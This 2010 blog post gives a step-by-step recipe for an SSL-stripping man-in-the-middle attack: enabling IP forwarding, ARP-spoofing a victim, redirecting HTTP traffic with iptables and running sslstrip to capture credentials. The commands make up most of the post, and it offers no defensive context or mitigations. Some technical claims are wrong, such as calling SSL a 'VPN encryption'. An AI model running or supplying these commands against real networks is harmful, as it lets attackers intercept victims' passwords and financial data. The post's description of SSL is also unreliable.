“Secure” Socket Layer (SSL)

Are you really sure that SSL connections are strong?. I mean, nobody can intercept your traffic, your passwords or even your bank account number. SSL is one of the world’s most important VPN encryption.

There is a tool (SSL strip) that the author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie. A recognized security consultant.

Configuring SSL-Strip

1st – Configure IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

2nd – Perform a Main-in-the-middle ARP attack

arpspoof -i eth0 -t VICTIM

3rd – Redirect traffic through iptables

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4th – Start SSLStrip in used port

python sslstrip.py -w archivo

Moxie’s website: http://www.thoughtcrime.org

Advertisements

Posted on 15 August 2010, in security, vulnerability and tagged , . Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: